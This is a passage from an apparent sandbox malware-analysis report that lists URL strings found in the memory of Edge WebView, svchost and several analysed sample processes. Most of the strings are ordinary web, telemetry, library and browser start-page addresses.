                  Source: msedgewebview2.exe, 00000020.00000002.3646373468.00001B4400114000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ecs.nel.measure.office.net/?TenantId=Edge&DestinationEndpoint=Edge-Prod-LAX31r5c&FrontEnd=AF
                  Source: msedgewebview2.exe, 00000020.00000002.3648242608.00001B4400192000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Edge&DestinationEndpoint=Edge-Prod-LAX31r5c&FrontEnd=AFD
                  Source: msedgewebview2.exe, 0000001D.00000002.3699910556.00002DDC0084C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://edge-conumer-static.azureedge.net/static/edropstatic/2023/09/13/2/static/css/main.ae43b158.c
                  Source: msedgewebview2.exe, 0000001D.00000002.3710696575.00002DDC010C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://edge-conumer-static.azureedge.net/static/edropstatic/2023/09/13/2/static/js/main.2c5481de.js
                  Source: msedgewebview2.exe, 0000001D.00000002.3692547371.00002DDC001B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://edge.ilive.cn
                  Source: msedgewebview2.exe, 00000026.00000003.2529580323.00004B180119C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://faq.whatsapp.com/1134168457974360
                  Source: msedgewebview2.exe, 00000026.00000003.2529580323.00004B180119C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://faq.whatsapp.com/253337763937767
                  Source: msedgewebview2.exe, 00000026.00000003.2529580323.00004B180119C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://faq.whatsapp.com/659113242716268
                  Source: msedgewebview2.exe, 00000026.00000003.2529580323.00004B180119C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://faq.whatsapp.com/725152392426717
                  Source: msedgewebview2.exe, 0000001D.00000003.2436721589.0000021F32A4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://feedback.smartsc10.0.19045.2006.vb_release
                  Source: msedgewebview2.exe, 0000001D.00000003.2436721589.0000021F32A4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://feedback.smartsc10.0.19045.2006.vb_release.aspx
                  Source: msedgewebview2.exe, 00000026.00000003.2426739799.00004B1800AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                  Source: msedgewebview2.exe, 00000026.00000003.2426739799.00004B1800AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com
                  Source: msedgewebview2.exe, 0000001D.00000002.3708840845.00002DDC00F6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com17
                  Source: msedgewebview2.exe, 00000020.00000003.2676119886.00001B4400378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;img-src
                  Source: msedgewebview2.exe, 0000001D.00000002.3696294430.00002DDC00614000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.comI
                  Source: msedgewebview2.exe, 0000001D.00000002.3708840845.00002DDC00F6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.comevtools
                  Source: msedgewebview2.exe, 0000001D.00000003.2379485108.00002DDC011B0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2367320467.00002DDC00C70000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2367024620.00002DDC01138000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2366973993.00002DDC01128000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2379410298.00002DDC011C8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2397720050.00002DDC011D8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2878193597.00001B4400394000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2373190613.00001B44003D8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2372950486.00001B4400394000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2373601415.00001B44003A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2867093294.00001B4400AD4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2676119886.00001B4400378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.comk
                  Source: msedgewebview2.exe, 0000001D.00000003.2379485108.00002DDC011B0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2367320467.00002DDC00C70000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2367024620.00002DDC01138000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2366973993.00002DDC01128000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2379410298.00002DDC011C8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2397720050.00002DDC011D8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2878193597.00001B4400394000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2373190613.00001B44003D8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2372950486.00001B4400394000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2373601415.00001B44003A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2867093294.00001B4400AD4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2676119886.00001B4400378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.comkc
                  Source: svchost.exe, 0000001B.00000003.2282246046.000002A2C3CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                  Source: svchost.exe, 0000001B.00000003.2282246046.000002A2C3D1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                  Source: svchost.exe, 0000001B.00000003.2282246046.000002A2C3CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                  Source: svchost.exe, 0000001B.00000003.2282246046.000002A2C3CC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                  Source: svchost.exe, 0000001B.00000003.2282246046.000002A2C3CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gamebox.160.com/static
                  Source: Botmaster 5.8 direct.exe, 00000008.00000003.2198814723.00000000042B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json/issues/652
                  Source: msedgewebview2.exe, 00000020.00000003.2622810618.00001B4400804000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2389422127.00001B44004B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2419981673.00004B1800D08000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2397572939.00004B1800B48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/dcodeIO/ByteBuffer.js
                  Source: msedgewebview2.exe, 00000020.00000003.2622810618.00001B4400804000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2389422127.00001B44004B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2419981673.00004B1800D08000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2397572939.00004B1800B48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/dcodeIO/long.js
                  Source: msedgewebview2.exe, 00000020.00000003.2622810618.00001B4400804000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2389422127.00001B44004B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2419981673.00004B1800D08000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2397572939.00004B1800B48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/dcodeIO/protobuf.js
                  Source: msedgewebview2.exe, 00000026.00000003.2457349912.00004B18007BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/dfahlander/Dexie.js/wiki/Deprecations.
                  Source: Botmaster 5.8 direct.exe, 00000008.00000003.2201256888.00000000042B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/30ab651fcb4354552bd4891619a0bdd81e0ebdbf
                  Source: Botmaster 5.8 direct.exe, 00000008.00000003.2201256888.00000000042B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/30ab651fcb4354552bd4891619a0bdd81e0ebdbf8
                  Source: Botmaster 5.8 direct.exe, 00000008.00000003.2200775339.00000000042B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/7601f4f6225089ffb291dc7d58293c7bbf5c5d4f
                  Source: Botmaster 5.8 direct.exe, 00000008.00000003.2200775339.00000000042B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/7601f4f6225089ffb291dc7d58293c7bbf5c5d4f8
                  Source: Botmaster 5.8 direct.exe, 00000008.00000003.2202463761.00000000042B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime
                  Source: msedgewebview2.exe, 00000020.00000003.2397132096.00001B4400804000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2470478995.00004B180113C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2416602382.00004B1800E60000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2463086287.00004B1801118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2455225183.00004B1800E70000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2451528199.00004B1800E68000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2455738825.00004B1800E78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/focus-trap/tabbable/blob/master/LICENSE
                  Source: msedgewebview2.exe, 00000020.00000003.2551479725.00001B44004B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/gajus/sister
                  Source: msedgewebview2.exe, 00000020.00000003.2551479725.00001B44004B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/gajus/sister/blob/master/LICENSE
                  Source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, 00000000.00000002.2053102955.0000000002A70000.00000004.08000000.00040000.00000000.sdmp, WinUpdate.exe, 0000000E.00000002.2159698585.0000000004738000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 0000000E.00000002.2157680311.0000000003462000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 00000022.00000002.2353065439.0000000004109000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 00000022.00000002.2346424155.0000000002CDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                  Source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, 00000000.00000002.2053102955.0000000002A70000.00000004.08000000.00040000.00000000.sdmp, WinUpdate.exe, 0000000E.00000002.2159698585.0000000004738000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 0000000E.00000002.2157680311.0000000003462000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 00000022.00000002.2353065439.0000000004109000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 00000022.00000002.2346424155.0000000002CDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                  Source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, 00000000.00000002.2053102955.0000000002A70000.00000004.08000000.00040000.00000000.sdmp, WinUpdate.exe, 0000000E.00000002.2159698585.0000000004738000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 0000000E.00000002.2157680311.0000000003462000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 00000022.00000002.2353065439.0000000004109000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 00000022.00000002.2346424155.0000000002CDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                  Source: msedgewebview2.exe, 00000024.00000003.2331494673.00002454006AC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000003.2330982499.0000245400834000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000003.2331129942.00002454006AC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000003.2331298416.00002454006A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000003.2331129942.0000245400694000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2363775860.00004B18003C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/w3c/csswg-drafts/issues/6939#issuecomment-1016679588
                  Source: msedgewebview2.exe, 0000001D.00000002.3693237450.00002DDC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                  Source: msedgewebview2.exe, 0000001D.00000002.3693237450.00002DDC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/on
                  Source: msedgewebview2.exe, 0000001D.00000002.3695423646.00002DDC00524000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gostop.hangame.com/index.nhn?gameId=msduelgo&utm_source=msduelgo&utm_medium=icon&utm_campaig
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://h5.mcetab.com
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hao.360.cn/?a1004
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hao.360.com/?360safe
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hao.360.com/?a1004
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hao.360.com/?a1111
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hao.360.com/?h_lnk
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hao.360.com/?installer
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hao.360.com/?src=jsqth
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hao.360.com/?src=lm&ls=
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hao.360.com/?wd_xp1
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hao.360.com/?y1001
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hao.360.com/?y1002
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hao.360.com/?y1013
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hao.lenovo.ilive.cn
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hao.qq.com/?unc=
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hao.qq.com/?unc=Af31026&s=o400493_1
                  Source: msedgewebview2.exe, 0000001D.00000002.3695585487.00002DDC0055C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hao123-static.cdn.bcebos.com/manual-res/jump_index.html
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hk.eynbm.com
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hlj04.com
                  Source: msedgewebview2.exe, 00000024.00000003.2331494673.00002454006AC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000003.2330982499.0000245400834000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000003.2331129942.00002454006AC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000003.2331298416.00002454006A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000003.2331129942.0000245400694000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2363775860.00004B18003C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/C/#the-details-and-summary-elements
                  Source: msedgewebview2.exe, 00000024.00000003.2331494673.00002454006AC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000003.2330982499.0000245400834000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000003.2331129942.00002454006AC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000003.2331298416.00002454006A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000003.2331129942.0000245400694000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2363775860.00004B18003C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/rendering.html#flow-content-3
                  Source: msedgewebview2.exe, 00000024.00000003.2331494673.00002454006AC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000003.2330982499.0000245400834000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000003.2331129942.00002454006AC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000003.2331298416.00002454006A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000003.2331129942.0000245400694000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2363775860.00004B18003C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/rendering.html#hidden-elements
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ilive.lenovo.com.cn/?f=
                  Source: msedgewebview2.exe, 0000001D.00000002.3695321952.00002DDC004B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2433733969.00002454008BC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2417511260.0000245400298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://int.msn.cn/
                  Source: msedgewebview2.exe, 0000001D.00000002.3695321952.00002DDC004B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2433733969.00002454008BC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2417511260.0000245400298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://int.msn.com/
                  Source: msedgewebview2.exe, 0000001D.00000002.3695321952.00002DDC004B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2433733969.00002454008BC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2417511260.0000245400298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://int1.msn.cn/
                  Source: msedgewebview2.exe, 0000001D.00000002.3695321952.00002DDC004B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2433733969.00002454008BC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2417511260.0000245400298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://int1.msn.com/
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://internet-start.net/?
                  Source: msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3666573945.000030DC00150000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3669480967.000030DC00298000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3664589668.000030DC00104000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
                  Source: msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3666573945.000030DC00150000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3669480967.000030DC00298000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3664589668.000030DC00104000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
                  Source: msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097ure
                  Source: msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3666573945.000030DC00150000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3669480967.000030DC00298000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3664589668.000030DC00104000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
                  Source: msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3666573945.000030DC00150000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3669480967.000030DC00298000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3664589668.000030DC00104000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
                  Source: msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444ys
                  Source: msedgewebview2.exe, 0000001F.00000003.2323203239.000030DC00168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
                  Source: msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/2200699030
                  Source: msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3666573945.000030DC00150000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3669480967.000030DC00298000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3664589668.000030DC00104000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
                  Source: msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3666573945.000030DC00150000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3669480967.000030DC00298000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3664589668.000030DC00104000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
                  Source: msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3666573945.000030DC00150000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3669480967.000030DC00298000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3664589668.000030DC00104000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
                  Source: msedgewebview2.exe, 0000001F.00000003.2323203239.000030DC00168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
                  Source: msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748abDropdown
                  Source: msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3666573945.000030DC00150000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3669480967.000030DC00298000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3668052589.000030DC00224000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
                  Source: msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/2582074030
                  Source: msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
                  Source: msedgewebview2.exe, 0000001F.00000003.2323334499.000030DC001CC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3666573945.000030DC00150000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3669480967.000030DC00298000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3664589668.000030DC00104000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001F.00000002.3660195769.000030DC0000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
                  Source: msedgewebview2.exe, 0000001F.00000003.2323203239.000030DC00168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
                  Source: msedgewebview2.exe, 0000001F.00000002.3660388000.000030DC00024000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273J
                  Source: msedgewebview2.exe, 0000001D.00000002.3696369453.00002DDC00628000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273r
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jg.awaliwa.com
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jianjie.2345.com
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kf.07073.com
